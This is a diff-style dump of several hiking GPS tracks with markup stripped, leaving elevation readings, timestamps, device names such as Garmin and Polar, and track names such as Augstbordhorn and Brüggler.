+1443.08
+2014-10-03T09:25:38Z
+
+
+1460.38
+2014-10-03T09:27:19Z
+
+
+1475.28
+2014-10-03T09:29:30Z
+
+
+1482.01
+2014-10-03T09:31:50Z
+
+
+1491.62
+2014-10-03T09:33:10Z
+
+
+1493.06
+2014-10-03T09:34:48Z
+
+
+1498.35
+2014-10-03T09:36:04Z
+
+
+1983.82
+2014-10-03T09:37:33Z
+
+
+2024.19
+2014-10-03T09:38:16Z
+
+
+2037.65
+2014-10-03T09:38:57Z
+
+
+2039.57
+2014-10-03T09:39:41Z
+
+
+2039.09
+2014-10-03T09:40:03Z
+
+
+1802.61
+2014-10-03T09:41:36Z
+
+
+1702.15
+2014-10-03T09:43:14Z
+
+
+1622.84
+2014-10-03T09:43:53Z
+
+
+1577.18
+2014-10-03T09:44:55Z
+
+
+1555.07
+2014-10-03T09:46:01Z
+
+
+1556.99
+2014-10-03T09:49:00Z
+
+
+1597.37
+2014-10-03T09:52:20Z
+
+
+1602.66
+2014-10-03T09:52:46Z
+
+
+1609.38
+2014-10-03T09:57:44Z
+
+
+1603.14
+2014-10-03T09:59:46Z
+
+
+1611.79
+2014-10-03T10:01:39Z
+
+
+1621.88
+2014-10-03T10:04:49Z
+
+
+1622.36
+2014-10-03T10:07:03Z
+
+
+1622.84
+2014-10-03T10:10:37Z
+
+
+1621.88
+2014-10-03T10:12:47Z
+
+
+1643.03
+2014-10-03T10:13:10Z
+
+
+1644.95
+2014-10-03T10:13:36Z
+
+
+1703.11
+2014-10-03T10:15:34Z
+
+
+1737.72
+2014-10-03T10:21:25Z
+
+
+1768.96
+2014-10-03T10:26:37Z
+
+
+1800.21
+2014-10-03T10:28:42Z
+
+
+1826.64
+2014-10-03T10:30:51Z
+
+
+1844.43
+2014-10-03T10:33:20Z
+
+
+1879.51
+2014-10-03T10:38:45Z
+
+
+1933.35
+2014-10-03T10:45:53Z
+
+
+1955.94
+2014-10-03T10:47:48Z
+
+
+1966.99
+2014-10-03T10:49:19Z
+
+
+1975.65
+2014-10-03T10:50:56Z
+
+
+2005.45
+2014-10-03T10:55:06Z
+
+
+2004.01
+2014-10-03T10:56:19Z
+
+
+2004.97
+2014-10-03T10:57:46Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-23T13:30:52Z
+
+2015-04-23 15:30:50
+
+
+
+
+
+
+863.34
+2015-04-23T11:41:00Z
+
+
+865.4
+2015-04-23T11:42:17Z
+
+
+868.66
+2015-04-23T11:44:12Z
+
+
+873.78
+2015-04-23T11:45:12Z
+
+
+874.88
+2015-04-23T11:49:42Z
+
+
+879.99
+2015-04-23T11:50:51Z
+
+
+904.27
+2015-04-23T11:52:34Z
+
+
+923.77
+2015-04-23T11:53:50Z
+
+
+946.38
+2015-04-23T11:55:14Z
+
+
+959.53
+2015-04-23T12:02:36Z
+
+
+956.24
+2015-04-23T12:03:57Z
+
+
+951.72
+2015-04-23T12:05:57Z
+
+
+954.73
+2015-04-23T12:08:41Z
+
+
+946.7
+2015-04-23T12:10:17Z
+
+
+956.28
+2015-04-23T12:12:13Z
+
+
+959.78
+2015-04-23T12:15:03Z
+
+
+946.69
+2015-04-23T12:19:56Z
+
+
+951.18
+2015-04-23T12:20:37Z
+
+
+940.0
+2015-04-23T12:21:42Z
+
+
+939.3
+2015-04-23T12:22:29Z
+
+
+939.93
+2015-04-23T12:23:14Z
+
+
+942.22
+2015-04-23T12:24:01Z
+
+
+946.54
+2015-04-23T12:24:42Z
+
+
+934.57
+2015-04-23T12:26:22Z
+
+
+929.15
+2015-04-23T12:27:55Z
+
+
+919.72
+2015-04-23T12:33:20Z
+
+
+930.14
+2015-04-23T12:36:07Z
+
+
+930.05
+2015-04-23T12:37:01Z
+
+
+929.83
+2015-04-23T12:37:51Z
+
+
+934.28
+2015-04-23T12:38:41Z
+
+
+948.42
+2015-04-23T12:41:49Z
+
+
+968.51
+2015-04-23T12:43:48Z
+
+
+977.7
+2015-04-23T12:48:44Z
+
+
+981.86
+2015-04-23T12:51:17Z
+
+
+983.0
+2015-04-23T12:54:58Z
+
+
+984.76
+2015-04-23T12:55:53Z
+
+
+975.96
+2015-04-23T12:57:51Z
+
+
+974.9
+2015-04-23T12:58:42Z
+
+
+978.3
+2015-04-23T12:59:34Z
+
+
+978.7
+2015-04-23T13:00:26Z
+
+
+977.46
+2015-04-23T13:01:20Z
+
+
+978.37
+2015-04-23T13:03:32Z
+
+
+958.49
+2015-04-23T13:06:29Z
+
+
+918.06
+2015-04-23T13:08:46Z
+
+
+917.39
+2015-04-23T13:09:22Z
+
+
+913.81
+2015-04-23T13:13:35Z
+
+
+898.7
+2015-04-23T13:14:41Z
+
+
+892.15
+2015-04-23T13:16:01Z
+
+
+895.89
+2015-04-23T13:17:56Z
+
+
+890.12
+2015-04-23T13:18:42Z
+
+
+880.18
+2015-04-23T13:19:23Z
+
+
+884.93
+2015-04-23T13:24:21Z
+
+
+875.59
+2015-04-23T13:25:16Z
+
+
+873.21
+2015-04-23T13:26:13Z
+
+
+871.56
+2015-04-23T13:27:28Z
+
+
+870.6
+2015-04-23T13:27:43Z
+
+
+870.65
+2015-04-23T13:28:43Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-06-02T15:04:33Z
+
+2014-06-02 16:04:30
+
+
+
+
+
+
+1491.9
+2014-06-02T14:14:56Z
+
+
+1483.05
+2014-06-02T14:21:46Z
+
+
+1479.46
+2014-06-02T14:22:13Z
+
+
+1481.9
+2014-06-02T14:23:18Z
+
+
+1491.45
+2014-06-02T14:25:24Z
+
+
+1465.08
+2014-06-02T14:34:19Z
+
+
+1465.54
+2014-06-02T14:40:50Z
+
+
+1457.96
+2014-06-02T14:43:04Z
+
+
+1442.53
+2014-06-02T14:46:21Z
+
+
+1416.02
+2014-06-02T14:51:34Z
+
+
+1410.33
+2014-06-02T14:52:23Z
+
+
+1391.49
+2014-06-02T14:58:45Z
+
+
+1373.85
+2014-06-02T15:02:41Z
+
+
+1374.42
+2014-06-02T15:04:21Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-05-27T18:26:01Z
+
+2015-05-27 20:25:58
+
+
+
+
+
+
+1072.93
+2015-05-27T17:09:36Z
+
+
+1069.89
+2015-05-27T17:10:51Z
+
+
+1079.13
+2015-05-27T17:12:21Z
+
+
+1167.93
+2015-05-27T17:21:41Z
+
+
+1194.28
+2015-05-27T17:26:56Z
+
+
+1292.88
+2015-05-27T17:37:07Z
+
+
+1351.94
+2015-05-27T17:41:29Z
+
+
+1395.81
+2015-05-27T17:46:27Z
+
+
+1399.51
+2015-05-27T18:02:31Z
+
+
+1381.38
+2015-05-27T18:03:55Z
+
+
+1372.23
+2015-05-27T18:05:07Z
+
+
+1336.49
+2015-05-27T18:06:44Z
+
+
+1270.22
+2015-05-27T18:10:50Z
+
+
+1181.1
+2015-05-27T18:17:40Z
+
+
+1163.32
+2015-05-27T18:19:04Z
+
+
+1148.09
+2015-05-27T18:20:00Z
+
+
+1142.35
+2015-05-27T18:21:13Z
+
+
+1100.52
+2015-05-27T18:23:24Z
+
+
+1081.72
+2015-05-27T18:24:39Z
+
+
+1074.73
+2015-05-27T18:25:54Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-06-17T19:43:24Z
+
+
+SpotMe 17.06.16
+
+
+
+
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+
+
+2016-05-17T21:40:16Z
+ "
+"
+
+
+
+
+
+
+
+Under dem Birg-Engstligenalp
+
+
+
+1400.125
+
+
+1401.94140625
+
+
+1407.578125
+
+
+1412.4453125
+
+
+1409.89453125
+
+
+1440.33984375
+
+
+1448.75390625
+
+
+1455.58984375
+
+
+1477.1328125
+
+
+1514.11328125
+
+
+1510.1953125
+
+
+1547.7578125
+
+
+1603.55859375
+
+
+1582.72265625
+
+
+1594.51953125
+
+
+1597.3671875
+
+
+1633.28515625
+
+
+1641.32421875
+
+
+1669.390625
+
+
+1651.16015625
+
+
+1674.1015625
+
+
+1662.36328125
+
+
+1677.0859375
+
+
+1693.47265625
+
+
+1741.66796875
+
+
+1738.6953125
+
+
+1774.73828125
+
+
+1801.8125
+
+
+1785.5703125
+
+
+1798.81640625
+
+
+1821.140625
+
+
+1820.95703125
+
+
+1834.1640625
+
+
+1842.3984375
+
+
+1859.65234375
+
+
+1928.85546875
+
+
+1914.1796875
+
+
+1930.44140625
+
+
+1940.0625
+
+
+1927.87890625
+
+
+1931.8125
+ "
+"
+
+
+
+
+
+
+
+Traccia 17/9/2017 (20170917142825012)
+
+
+
+567.0
+2017-09-17T12:28:30Z
+
+
+589.0
+2017-09-17T12:29:19Z
+
+
+588.0
+2017-09-17T12:30:40Z
+
+
+618.0
+2017-09-17T12:35:20Z
+
+
+644.0
+2017-09-17T12:40:00Z
+
+
+639.0
+2017-09-17T12:41:25Z
+
+
+635.0
+2017-09-17T12:41:45Z
+
+
+643.0
+2017-09-17T12:42:05Z
+
+
+659.0
+2017-09-17T12:42:45Z
+
+
+653.0
+2017-09-17T12:45:42Z
+
+
+652.0
+2017-09-17T13:05:16Z
+
+
+654.0
+2017-09-17T13:07:20Z
+
+
+657.0
+2017-09-17T13:08:01Z
+
+
+662.0
+2017-09-17T13:08:31Z
+
+
+667.0
+2017-09-17T13:09:11Z
+
+
+666.0
+2017-09-17T13:14:00Z
+
+
+658.0
+2017-09-17T13:14:32Z
+
+
+658.0
+2017-09-17T13:14:51Z
+
+
+629.0
+2017-09-17T13:17:51Z
+
+
+627.0
+2017-09-17T13:18:05Z
+
+
+608.0
+2017-09-17T13:19:25Z
+
+
+593.0
+2017-09-17T13:20:10Z
+
+
+583.0
+2017-09-17T13:22:32Z
+
+
+583.0
+2017-09-17T13:22:52Z
+
+
+584.0
+2017-09-17T13:23:06Z
+
+
+580.0
+2017-09-17T13:24:16Z
+
+
+581.0
+2017-09-17T13:26:32Z
+
+
+576.0
+2017-09-17T13:26:52Z
+
+
+561.0
+2017-09-17T13:27:31Z
+
+
+566.0
+2017-09-17T13:28:51Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-11-07T19:30:02Z
+
+
+141107 Hochsalwand Spot
+
+
+
+
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+
+
+2014-10-07T16:41:12Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-10-15T12:12:09Z
+
+A5-OKT-16 14:12:01
+
+
+
+
+
+391.87
+2016-10-15T10:03:11Z
+
+
+369.28
+2016-10-15T10:05:32Z
+
+
+398.6
+2016-10-15T10:14:53Z
+
+
+418.31
+2016-10-15T10:17:34Z
+
+
+437.06
+2016-10-15T10:22:33Z
+
+
+438.02
+2016-10-15T10:24:45Z
+
+
+419.27
+2016-10-15T10:31:03Z
+
+
+422.16
+2016-10-15T10:44:53Z
+
+
+427.92
+2016-10-15T10:50:40Z
+
+
+428.4
+2016-10-15T10:57:03Z
+
+
+423.12
+2016-10-15T11:06:11Z
+
+
+388.51
+2016-10-15T11:22:05Z
+
+
+423.6
+2016-10-15T11:27:12Z
+
+
+429.37
+2016-10-15T11:34:01Z
+
+
+431.29
+2016-10-15T11:36:16Z
+
+
+437.54
+2016-10-15T11:40:39Z
+
+
+440.42
+2016-10-15T11:45:49Z
+
+
+451.0
+2016-10-15T11:50:39Z
+
+
+451.96
+2016-10-15T11:53:14Z
+
+
+445.71
+2016-10-15T11:55:13Z
+
+
+421.68
+2016-10-15T11:58:39Z
+
+
+395.24
+2016-10-15T12:05:01Z
+
+
+387.07
+2016-10-15T12:07:49Z
+
+
+386.11
+2016-10-15T12:09:55Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-09-04T19:09:26Z
+
+
+2016-09-04-01
+
+
+
+
+
+
+1497.8
+2016-09-04T09:06:47Z
+
+
+1498.7
+2016-09-04T09:07:50Z
+
+
+1514.8
+2016-09-04T09:11:12Z
+
+
+1512.9
+2016-09-04T09:12:19Z
+
+
+1510.1
+2016-09-04T09:14:18Z
+
+
+1527.6
+2016-09-04T09:18:18Z
+
+
+1540.9
+2016-09-04T09:19:24Z
+
+
+1551.5
+2016-09-04T09:21:06Z
+
+
+1566.1
+2016-09-04T09:23:07Z
+
+
+1576.2
+2016-09-04T09:25:24Z
+
+
+1584.2
+2016-09-04T09:28:37Z
+
+
+1578.9
+2016-09-04T09:32:23Z
+
+
+1581.6
+2016-09-04T09:35:09Z
+
+
+1579.6
+2016-09-04T09:36:09Z
+
+
+1574.2
+2016-09-04T09:38:08Z
+
+
+1577.7
+2016-09-04T09:40:28Z
+
+
+1575.1
+2016-09-04T09:43:42Z
+
+
+1570.6
+2016-09-04T09:45:38Z
+
+
+1574.4
+2016-09-04T09:48:21Z
+
+
+1584.9
+2016-09-04T09:49:48Z
+
+
+1614.5
+2016-09-04T09:52:48Z
+
+
+1619.8
+2016-09-04T09:54:30Z
+
+
+1616.9
+2016-09-04T09:56:15Z
+
+
+1621.8
+2016-09-04T09:57:33Z
+
+
+1613.2
+2016-09-04T09:59:11Z
+
+
+1618.1
+2016-09-04T10:00:21Z
+
+
+1620.4
+2016-09-04T10:01:02Z
+
+
+1618.5
+2016-09-04T10:02:36Z
+
+
+1622.5
+2016-09-04T10:04:14Z
+
+
+1611.9
+2016-09-04T10:07:27Z
+
+
+1604.5
+2016-09-04T10:08:09Z
+
+
+1602.7
+2016-09-04T10:09:23Z
+
+
+1608.7
+2016-09-04T10:11:40Z
+
+
+1598.4
+2016-09-04T10:16:16Z
+
+
+1622.0
+2016-09-04T10:24:22Z
+
+
+1627.4
+2016-09-04T10:25:33Z
+
+
+1605.9
+2016-09-04T10:43:53Z
+
+
+1603.4
+2016-09-04T10:46:07Z
+
+
+1603.2
+2016-09-04T10:48:20Z
+
+
+1611.3
+2016-09-04T10:54:30Z
+
+
+1615.4
+2016-09-04T10:57:18Z
+
+
+1615.0
+2016-09-04T10:58:11Z
+
+
+1617.0
+2016-09-04T10:59:29Z
+
+
+1628.2
+2016-09-04T11:02:06Z
+
+
+1626.0
+2016-09-04T11:04:19Z
+
+
+1626.0
+2016-09-04T11:05:38Z
+
+
+1622.1
+2016-09-04T11:07:42Z
+
+
+1621.7
+2016-09-04T11:09:17Z
+
+
+1620.8
+2016-09-04T11:11:01Z
+
+
+1621.7
+2016-09-04T11:12:16Z
+
+
+1598.0
+2016-09-04T11:14:43Z
+
+
+1580.8
+2016-09-04T11:17:15Z
+
+
+1574.0
+2016-09-04T11:19:46Z
+
+
+1564.1
+2016-09-04T11:23:01Z
+
+
+1578.4
+2016-09-04T11:25:39Z
+
+
+1595.1
+2016-09-04T11:29:05Z
+
+
+1577.4
+2016-09-04T11:31:00Z
+
+
+1571.6
+2016-09-04T11:33:44Z
+
+
+1576.2
+2016-09-04T11:34:51Z
+
+
+1569.6
+2016-09-04T11:37:24Z
+
+
+1579.5
+2016-09-04T11:40:20Z
+
+
+1586.9
+2016-09-04T11:43:30Z
+
+
+1582.4
+2016-09-04T11:45:06Z
+
+
+1581.2
+2016-09-04T11:46:28Z
+
+
+1578.7
+2016-09-04T11:47:02Z
+
+
+1564.5
+2016-09-04T11:50:01Z
+
+
+1557.3
+2016-09-04T11:51:22Z
+
+
+1536.7
+2016-09-04T11:54:26Z
+
+
+1533.1
+2016-09-04T11:55:09Z
+
+
+1526.0
+2016-09-04T11:56:05Z
+
+
+1523.4
+2016-09-04T11:56:30Z
+
+
+1509.1
+2016-09-04T11:59:44Z
+ "
+"
+
+
+
+
+
+
+
+AUGSTBORDHORN
+
+
+
+2047.0
+
+
+2054.2
+
+
+2067.8
+
+
+2076.9
+
+
+2086.8
+
+
+2104.8
+
+
+2116.0
+
+
+2124.6
+
+
+2142.5
+
+
+2170.4
+
+
+2189.2
+
+
+2197.0
+
+
+2199.4
+
+
+2207.3
+
+
+2225.3
+
+
+2233.0
+
+
+2240.4
+
+
+2247.4
+
+
+2258.5
+
+
+2261.2
+
+
+2268.0
+
+
+2285.3
+
+
+2302.1
+
+
+2303.3
+
+
+2309.5
+
+
+2316.5
+
+
+2347.2
+
+
+2370.5
+
+
+2411.7
+
+
+2428.2
+
+
+2449.4
+
+
+2460.9
+
+
+2486.1
+
+
+2498.1
+
+
+2511.9
+
+
+2513.7
+
+
+2519.1
+
+
+2526.2
+
+
+2543.6
+
+
+2569.9
+
+
+2592.9
+
+
+2606.0
+
+
+2634.0
+
+
+2652.8
+
+
+2679.4
+
+
+2695.5
+
+
+2699.9
+
+
+2723.5
+
+
+2756.8
+
+
+2761.9
+
+
+2775.3
+
+
+2789.4
+
+
+2803.0
+
+
+2804.9
+
+
+2799.4
+
+
+2809.1
+
+
+2821.4
+
+
+2827.5
+
+
+2828.1
+
+
+2819.1
+
+
+2808.8
+
+
+2835.1
+
+
+2882.3
+
+
+2897.3
+
+
+2905.4
+
+
+2953.1
+
+
+2951.8
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-08-27T12:26:53Z
+
+2015-08-27 14:26:51
+
+
+
+
+
+
+1275.6
+2015-08-27T07:12:00Z
+
+
+1278.25
+2015-08-27T07:12:54Z
+
+
+1279.11
+2015-08-27T07:13:55Z
+
+
+1288.86
+2015-08-27T07:17:53Z
+
+
+1299.32
+2015-08-27T07:20:40Z
+
+
+1300.93
+2015-08-27T07:22:03Z
+
+
+1309.36
+2015-08-27T07:23:18Z
+
+
+1319.83
+2015-08-27T07:25:16Z
+
+
+1331.2
+2015-08-27T07:27:56Z
+
+
+1337.13
+2015-08-27T07:29:59Z
+
+
+1348.95
+2015-08-27T07:31:24Z
+
+
+1367.82
+2015-08-27T07:34:57Z
+
+
+1371.63
+2015-08-27T07:36:34Z
+
+
+1382.52
+2015-08-27T07:38:05Z
+
+
+1394.86
+2015-08-27T07:40:06Z
+
+
+1415.71
+2015-08-27T07:44:01Z
+
+
+1425.0
+2015-08-27T07:45:17Z
+
+
+1429.28
+2015-08-27T07:45:56Z
+
+
+1435.14
+2015-08-27T07:46:48Z
+
+
+1441.83
+2015-08-27T07:48:34Z
+
+
+1445.25
+2015-08-27T07:49:51Z
+
+
+1458.05
+2015-08-27T07:51:56Z
+
+
+1482.25
+2015-08-27T07:55:25Z
+
+
+1530.21
+2015-08-27T08:03:42Z
+
+
+1551.74
+2015-08-27T08:06:56Z
+
+
+1569.79
+2015-08-27T08:09:17Z
+
+
+1586.32
+2015-08-27T08:16:17Z
+
+
+1621.87
+2015-08-27T08:35:58Z
+
+
+1711.09
+2015-08-27T08:50:50Z
+
+
+1704.23
+2015-08-27T09:18:08Z
+
+
+1705.78
+2015-08-27T09:21:58Z
+
+
+1698.63
+2015-08-27T09:28:57Z
+
+
+1687.58
+2015-08-27T09:32:49Z
+
+
+1703.16
+2015-08-27T09:39:32Z
+
+
+1708.35
+2015-08-27T09:41:46Z
+
+
+1718.92
+2015-08-27T09:43:02Z
+
+
+1720.71
+2015-08-27T09:45:06Z
+
+
+1733.73
+2015-08-27T09:47:16Z
+
+
+1752.87
+2015-08-27T09:53:07Z
+
+
+1759.69
+2015-08-27T09:54:26Z
+
+
+1758.6
+2015-08-27T09:58:23Z
+
+
+1724.28
+2015-08-27T11:44:42Z
+
+
+1710.19
+2015-08-27T11:45:55Z
+
+
+1685.41
+2015-08-27T11:47:31Z
+
+
+1664.13
+2015-08-27T11:49:11Z
+
+
+1644.48
+2015-08-27T11:50:28Z
+
+
+1616.16
+2015-08-27T11:57:22Z
+
+
+1602.72
+2015-08-27T11:59:32Z
+
+
+1591.83
+2015-08-27T12:02:35Z
+
+
+1577.4
+2015-08-27T12:04:14Z
+
+
+1525.95
+2015-08-27T12:09:29Z
+
+
+1453.61
+2015-08-27T12:13:51Z
+
+
+1436.66
+2015-08-27T12:14:51Z
+
+
+1429.57
+2015-08-27T12:15:24Z
+
+
+1408.83
+2015-08-27T12:17:47Z
+
+
+1395.69
+2015-08-27T12:18:56Z
+
+
+1383.59
+2015-08-27T12:19:38Z
+
+
+1372.65
+2015-08-27T12:20:23Z
+
+
+1352.8
+2015-08-27T12:21:58Z
+
+
+1333.84
+2015-08-27T12:23:28Z
+
+
+1325.9
+2015-08-27T12:24:02Z
+
+
+1307.44
+2015-08-27T12:25:30Z
+
+
+1299.33
+2015-08-27T12:26:00Z
+
+
+1297.28
+2015-08-27T12:26:33Z
+ "
+"
+
+
+
+Federal Office of Topography Switzerland
+
+
+
+
+Brüggler
+
+
+
+1241.0
+2015-10-24T09:24:02Z
+
+
+1245.0
+2015-10-24T09:25:42Z
+
+
+1255.0
+2015-10-24T09:26:42Z
+
+
+1261.0
+2015-10-24T09:29:02Z
+
+
+1275.0
+2015-10-24T09:30:22Z
+
+
+1286.0
+2015-10-24T09:32:02Z
+
+
+1301.0
+2015-10-24T09:33:22Z
+
+
+1315.0
+2015-10-24T09:34:22Z
+
+
+1334.0
+2015-10-24T09:36:02Z
+
+
+1365.0
+2015-10-24T09:38:42Z
+
+
+1423.0
+2015-10-24T09:44:02Z
+
+
+1468.0
+2015-10-24T09:47:42Z
+
+
+1476.0
+2015-10-24T09:48:42Z
+
+
+1488.0
+2015-10-24T09:50:42Z
+
+
+1490.0
+2015-10-24T09:51:02Z
+
+
+1514.0
+2015-10-24T09:53:22Z
+
+
+1542.0
+2015-10-24T09:55:42Z
+
+
+1572.0
+2015-10-24T09:58:22Z
+
+
+1614.0
+2015-10-24T10:06:18Z
+
+
+1652.0
+2015-10-24T10:09:43Z
+
+
+1673.0
+2015-10-24T10:11:26Z
+
+
+1696.0
+2015-10-24T10:15:44Z
+
+
+1699.0
+2015-10-24T10:18:46Z
+
+
+1720.0
+2015-10-24T10:20:41Z
+
+
+1733.0
+2015-10-24T10:22:38Z
+
+
+1745.0
+2015-10-24T10:47:48Z
+
+
+1730.0
+2015-10-24T10:50:22Z
+
+
+1703.0
+2015-10-24T10:51:49Z
+
+
+1656.0
+2015-10-24T10:55:36Z
+
+
+1625.0
+2015-10-24T10:57:13Z
+
+
+1629.0
+2015-10-24T11:00:54Z
+
+
+1590.0
+2015-10-24T11:07:17Z
+
+
+1591.0
+2015-10-24T11:08:05Z
+
+
+1604.0
+2015-10-24T11:09:21Z
+
+
+1573.0
+2015-10-24T11:11:07Z
+
+
+1614.0
+2015-10-24T11:15:16Z
+
+
+1739.0
+2015-10-24T15:57:24Z
+
+
+1755.0
+2015-10-24T16:10:22Z
+
+
+1703.0
+2015-10-24T16:29:10Z
+
+
+1688.0
+2015-10-24T16:30:23Z
+
+
+1650.0
+2015-10-24T16:32:10Z
+
+
+1586.0
+2015-10-24T16:35:05Z
+
+
+1584.0
+2015-10-24T16:36:48Z
+
+
+1568.0
+2015-10-24T16:39:05Z
+
+
+1549.0
+2015-10-24T16:39:31Z
+
+
+1490.0
+2015-10-24T16:41:10Z
+
+
+1473.0
+2015-10-24T16:41:44Z
+
+
+1453.0
+2015-10-24T16:42:34Z
+
+
+1450.0
+2015-10-24T16:42:59Z
+
+
+1430.0
+2015-10-24T16:43:49Z
+
+
+1398.0
+2015-10-24T16:46:00Z
+
+
+1370.0
+2015-10-24T16:47:11Z
+
+
+1359.0
+2015-10-24T16:47:37Z
+
+
+1343.0
+2015-10-24T16:48:11Z
+
+
+1324.0
+2015-10-24T16:49:03Z
+
+
+1317.0
+2015-10-24T16:49:24Z
+
+
+1313.0
+2015-10-24T16:49:49Z
+
+
+1306.0
+2015-10-24T16:50:11Z
+
+
+1301.0
+2015-10-24T16:50:35Z
+
+
+1295.0
+2015-10-24T16:51:01Z
+
+
+1283.0
+2015-10-24T16:51:51Z
+
+
+1278.0
+2015-10-24T16:53:35Z
+
+
+1267.0
+2015-10-24T16:54:42Z
+
+
+1255.0
+2015-10-24T16:55:31Z
+
+
+1244.0
+2015-10-24T16:56:45Z
+
+
+1237.0
+2015-10-24T16:57:36Z
+
+
+1232.0
+2015-10-24T16:58:28Z
+
+
+1217.0
+2015-10-24T17:00:04Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+Polar
+
+
+
+2015-07-03T09:24:59Z
+
+
+
+
+1347.0
+2015-07-03T09:25:01Z
+
+
+1334.0
+2015-07-03T09:27:36Z
+
+
+1337.0
+2015-07-03T09:29:07Z
+
+
+1342.0
+2015-07-03T09:31:36Z
+
+
+1347.0
+2015-07-03T09:34:03Z
+
+
+1354.0
+2015-07-03T09:35:04Z
+
+
+1359.0
+2015-07-03T09:35:52Z
+
+
+1366.0
+2015-07-03T09:36:59Z
+
+
+1390.0
+2015-07-03T09:39:23Z
+
+
+1408.0
+2015-07-03T09:41:46Z
+
+
+1451.0
+2015-07-03T09:45:49Z
+
+
+1481.0
+2015-07-03T09:49:06Z
+
+
+1517.0
+2015-07-03T09:52:23Z
+
+
+1539.0
+2015-07-03T09:55:02Z
+
+
+1554.0
+2015-07-03T09:56:11Z
+
+
+1577.0
+2015-07-03T09:59:32Z
+
+
+1601.0
+2015-07-03T10:01:49Z
+
+
+1626.0
+2015-07-03T10:04:23Z
+
+
+1645.0
+2015-07-03T10:06:14Z
+
+
+1654.0
+2015-07-03T10:07:23Z
+
+
+1737.0
+2015-07-03T10:16:36Z
+
+
+1761.0
+2015-07-03T10:20:47Z
+
+
+1790.0
+2015-07-03T10:24:36Z
+
+
+1806.0
+2015-07-03T10:26:43Z
+
+
+1807.0
+2015-07-03T10:31:29Z
+
+
+1827.0
+2015-07-03T10:34:06Z
+
+
+1841.0
+2015-07-03T10:36:01Z
+
+
+1885.0
+2015-07-03T10:43:11Z
+
+
+1955.0
+2015-07-03T10:48:39Z
+
+
+1964.0
+2015-07-03T10:49:49Z
+
+
+2012.0
+2015-07-03T10:54:52Z
+
+
+2065.0
+2015-07-03T11:00:42Z
+
+
+2081.0
+2015-07-03T11:02:43Z
+
+
+2114.0
+2015-07-03T11:06:06Z
+
+
+2135.0
+2015-07-03T11:08:31Z
+
+
+2153.0
+2015-07-03T11:12:44Z
+
+
+2160.0
+2015-07-03T11:13:42Z
+
+
+2177.0
+2015-07-03T11:15:47Z
+
+
+2194.0
+2015-07-03T11:18:06Z
+
+
+2217.0
+2015-07-03T11:21:25Z
+
+
+2253.0
+2015-07-03T11:27:16Z
+
+
+2285.0
+2015-07-03T11:31:42Z
+
+
+2300.0
+2015-07-03T11:32:58Z
+
+
+2323.0
+2015-07-03T11:35:16Z
+
+
+2331.0
+2015-07-03T11:37:14Z
+
+
+2331.0
+2015-07-03T11:37:54Z
+
+
+2370.0
+2015-07-03T11:44:30Z
+
+
+2406.0
+2015-07-03T11:48:57Z
+
+
+2410.0
+2015-07-03T11:57:19Z
+
+
+2416.0
+2015-07-03T11:58:41Z
+
+
+2428.0
+2015-07-03T12:00:08Z
+
+
+2411.0
+2015-07-03T12:06:36Z
+
+
+2404.0
+2015-07-03T12:09:13Z
+
+
+2452.0
+2015-07-03T12:14:34Z
+
+
+2466.0
+2015-07-03T12:15:55Z
+ "
+"
+
+
+
+
+
+
